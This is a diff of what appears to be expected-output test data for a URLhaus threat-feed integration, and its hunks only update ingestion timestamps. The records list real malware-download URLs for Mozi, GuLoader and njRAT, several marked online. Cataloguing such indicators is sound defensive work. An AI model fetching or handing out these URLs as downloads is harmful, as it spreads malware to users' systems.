@@ -27678,7 +27678,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028781800Z", + "ingested": "2021-12-14T14:56:15.726635232Z", "original": "{\"id\":\"960981\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960981/\",\"url\":\"http://89.160.20.156:33465/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27727,7 +27727,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028790Z", + "ingested": "2021-12-14T14:56:15.726635613Z", "original": "{\"id\":\"960977\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960977/\",\"url\":\"http://89.160.20.156:59085/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:16:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27776,7 +27776,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028796800Z", + "ingested": "2021-12-14T14:56:15.726635978Z", "original": "{\"id\":\"960976\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960976/\",\"url\":\"http://89.160.20.156:33799/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:09:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -27825,7 +27825,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028803500Z", + "ingested": "2021-12-14T14:56:15.726636352Z", "original": "{\"id\":\"960972\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960972/\",\"url\":\"http://89.160.20.156:40430/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27874,7 +27874,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028810100Z", + "ingested": "2021-12-14T14:56:15.726636774Z", "original": "{\"id\":\"960973\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960973/\",\"url\":\"http://89.160.20.156:43006/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -27923,7 +27923,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028816600Z", + "ingested": "2021-12-14T14:56:15.726637143Z", "original": "{\"id\":\"960974\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960974/\",\"url\":\"http://89.160.20.156:33385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -27972,7 +27972,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028823400Z", + "ingested": "2021-12-14T14:56:15.726637522Z", "original": "{\"id\":\"960975\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960975/\",\"url\":\"http://89.160.20.156:56649/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28021,7 +28021,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028829900Z", + "ingested": "2021-12-14T14:56:15.726637885Z", "original": "{\"id\":\"960971\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960971/\",\"url\":\"http://89.160.20.156:55457/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28070,7 +28070,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028836500Z", + "ingested": "2021-12-14T14:56:15.726638252Z", "original": "{\"id\":\"960968\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960968/\",\"url\":\"http://89.160.20.156:52314/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -28119,7 +28119,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028843100Z", + "ingested": "2021-12-14T14:56:15.726638726Z", "original": "{\"id\":\"960969\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960969/\",\"url\":\"http://89.160.20.156:41985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28168,7 +28168,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028849800Z", + "ingested": "2021-12-14T14:56:15.726639091Z", "original": "{\"id\":\"960970\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960970/\",\"url\":\"http://89.160.20.156:53197/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", @@ -28217,7 +28217,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028856400Z", + "ingested": "2021-12-14T14:56:15.726639458Z", "original": "{\"id\":\"960967\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960967/\",\"url\":\"http://89.160.20.156:54472/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -28266,7 +28266,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028863Z", + "ingested": "2021-12-14T14:56:15.726639835Z", "original": "{\"id\":\"960966\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960966/\",\"url\":\"http://89.160.20.156:38100/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28315,7 +28315,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028869900Z", + "ingested": "2021-12-14T14:56:15.726640377Z", "original": "{\"id\":\"960964\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960964/\",\"url\":\"http://89.160.20.156:33121/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28364,7 +28364,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028876600Z", + "ingested": "2021-12-14T14:56:15.726640869Z", "original": "{\"id\":\"960965\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960965/\",\"url\":\"http://89.160.20.156:39363/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -28413,7 +28413,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028883300Z", + "ingested": "2021-12-14T14:56:15.726641238Z", "original": "{\"id\":\"960961\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960961/\",\"url\":\"http://89.160.20.156:42844/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28462,7 +28462,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028890100Z", + "ingested": "2021-12-14T14:56:15.726641605Z", "original": "{\"id\":\"960962\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960962/\",\"url\":\"http://89.160.20.156:45789/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28511,7 +28511,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028896600Z", + "ingested": "2021-12-14T14:56:15.726641971Z", "original": "{\"id\":\"960963\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960963/\",\"url\":\"http://89.160.20.156:34080/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -28560,7 +28560,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028903300Z", + "ingested": "2021-12-14T14:56:15.726642447Z", "original": "{\"id\":\"960960\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960960/\",\"url\":\"http://89.160.20.156:56067/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28609,7 +28609,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028909900Z", + "ingested": "2021-12-14T14:56:15.726642832Z", "original": "{\"id\":\"960959\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960959/\",\"url\":\"http://89.160.20.156:34205/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28658,7 +28658,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028916600Z", + "ingested": "2021-12-14T14:56:15.726643245Z", "original": "{\"id\":\"960957\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960957/\",\"url\":\"http://89.160.20.156:53239/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -28707,7 +28707,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028923100Z", + "ingested": "2021-12-14T14:56:15.726643613Z", "original": "{\"id\":\"960958\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960958/\",\"url\":\"http://89.160.20.156:53868/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28756,7 +28756,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028929800Z", + "ingested": "2021-12-14T14:56:15.726643992Z", "original": "{\"id\":\"960955\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960955/\",\"url\":\"http://89.160.20.156:39724/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28805,7 +28805,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028936400Z", + "ingested": "2021-12-14T14:56:15.726644362Z", "original": "{\"id\":\"960956\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960956/\",\"url\":\"http://89.160.20.156:60804/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -28854,7 +28854,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028943100Z", + "ingested": "2021-12-14T14:56:15.726644729Z", "original": "{\"id\":\"960953\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960953/\",\"url\":\"http://89.160.20.156:51949/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28903,7 +28903,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028949600Z", + "ingested": "2021-12-14T14:56:15.726645097Z", "original": "{\"id\":\"960954\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960954/\",\"url\":\"http://89.160.20.156:48224/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -28952,7 +28952,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028956300Z", + "ingested": "2021-12-14T14:56:15.726645464Z", "original": "{\"id\":\"960952\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960952/\",\"url\":\"http://89.160.20.156:37716/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -29001,7 +29001,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028962900Z", + "ingested": "2021-12-14T14:56:15.726645939Z", "original": "{\"id\":\"960951\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960951/\",\"url\":\"http://89.160.20.156:60524/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29049,7 +29049,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028969600Z", + "ingested": "2021-12-14T14:56:15.726646293Z", "original": "{\"id\":\"960946\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960946/\",\"url\":\"http://urlfrance.fr/code/dd.txt\",\"url_status\":\"offline\",\"host\":\"urlfrance.fr\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"Encoded\",\"njRAT\",\"rat\"]}", "category": "threat", "type": "indicator", @@ -29099,7 +29099,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028976200Z", + "ingested": "2021-12-14T14:56:15.726646666Z", "original": "{\"id\":\"960947\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960947/\",\"url\":\"http://89.160.20.156:49988/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", 
@@ -29148,7 +29148,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028982900Z", + "ingested": "2021-12-14T14:56:15.726647057Z", "original": "{\"id\":\"960948\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960948/\",\"url\":\"http://89.160.20.156:42857/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29198,7 +29198,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028989600Z", + "ingested": "2021-12-14T14:56:15.726647498Z", "original": "{\"id\":\"960949\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960949/\",\"url\":\"http://89.160.20.156:44751/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", @@ -29247,7 +29247,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.028996300Z", + "ingested": "2021-12-14T14:56:15.726648518Z", "original": "{\"id\":\"960950\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960950/\",\"url\":\"http://89.160.20.156:47719/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -29296,7 +29296,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029003100Z", + "ingested": "2021-12-14T14:56:15.726649033Z", "original": "{\"id\":\"960945\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960945/\",\"url\":\"http://89.160.20.156:38133/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:59:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29343,7 +29343,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029009700Z", + "ingested": "2021-12-14T14:56:15.726649401Z", "original": "{\"id\":\"960944\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960944/\",\"url\":\"http://www.sowetoson.com/new/Host_yjwloaz52.bin\",\"url_status\":\"online\",\"host\":\"www.sowetoson.com\",\"date_added\":\"2021-01-14 15:57:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29390,7 +29390,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029066700Z", + "ingested": "2021-12-14T14:56:15.726649776Z", "original": "{\"id\":\"960942\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960942/\",\"url\":\"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin\",\"url_status\":\"online\",\"host\":\"www.agamagroup.com.ng\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", 
@@ -29437,7 +29437,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029092100Z", + "ingested": "2021-12-14T14:56:15.726650144Z", "original": "{\"id\":\"960943\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960943/\",\"url\":\"https://onedrive.live.com/download?cid=8FE9EB3F9398B325\u0026resid=8FE9EB3F9398B325%21126\u0026authkey=AOzL9FiDhEYRkm8\",\"url_status\":\"online\",\"host\":\"onedrive.live.com\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29486,7 +29486,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029099300Z", + "ingested": "2021-12-14T14:56:15.726650509Z", "original": "{\"id\":\"960941\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960941/\",\"url\":\"http://89.160.20.156:46462/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29535,7 +29535,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029106Z", + "ingested": "2021-12-14T14:56:15.726650881Z", "original": "{\"id\":\"960940\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960940/\",\"url\":\"http://89.160.20.156:39046/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -29584,7 +29584,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029112700Z", + "ingested": "2021-12-14T14:56:15.726651250Z", "original": "{\"id\":\"960934\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960934/\",\"url\":\"http://89.160.20.156:47418/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29633,7 +29633,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029119200Z", + "ingested": "2021-12-14T14:56:15.726651645Z", "original": "{\"id\":\"960935\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960935/\",\"url\":\"http://89.160.20.156:42287/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29682,7 +29682,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029125800Z", + "ingested": "2021-12-14T14:56:15.726652015Z", "original": "{\"id\":\"960936\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960936/\",\"url\":\"http://89.160.20.156:49596/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", 
@@ -29731,7 +29731,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029132500Z", + "ingested": "2021-12-14T14:56:15.726652382Z", "original": "{\"id\":\"960937\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960937/\",\"url\":\"http://89.160.20.156:39815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", @@ -29780,7 +29780,7 @@ } }, "event": { - "ingested": "2021-12-13T08:40:08.029141100Z", + "ingested": "2021-12-14T14:56:15.726652742Z", "original": "{\"id\":\"960938\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960938/\",\"url\":\"http://89.160.20.156:36568/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 